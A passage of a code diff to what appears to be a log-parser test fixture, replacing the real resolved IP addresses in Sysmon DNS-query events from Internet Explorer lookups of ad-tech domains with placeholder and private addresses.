Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5279,7 +5279,7 @@ "ProcessId": "2736", "QueryName": "pixel-sync.sitescout.com", "QueryStatus": "0", - "QueryResults": "type: 5 pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;" + "QueryResults": "type: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;" }, "user": { "identifier": "S-1-5-18" @@ -5312,7 +5312,7 @@ "ProcessId": "2736", "QueryName": "prod.y-medialink.com", "QueryStatus": "0", - "QueryResults": "::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", @@ -5334,7 +5334,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5352,7 +5352,7 @@ "time_created": "2019-07-18T03:34:04.693Z", "level": "information", "event_data": { - "QueryResults": "type: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;", + "QueryResults": "type: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.507", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5376,7 +5376,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5388,7 +5388,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5400,7 +5400,7 @@ "ProcessId": "2736", "QueryName": "appnexus-partners.tremorhub.com", "QueryStatus": "0", - "QueryResults": "type: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;", + "QueryResults": "type: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", @@ -5430,7 +5430,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5449,7 +5449,7 @@ "event_data": { "QueryName": "x.dlx.addthis.com", "QueryStatus": "0", - "QueryResults": "type: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.531", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5472,7 +5472,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5489,7 +5489,7 @@ "ProcessId": "2736", "QueryName": "dh.serving-sys.com", "QueryStatus": "0", - "QueryResults": "type: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "type: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.532", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -5511,7 +5511,7 @@ { "@timestamp": "2021-05-05T15:30:51.707Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 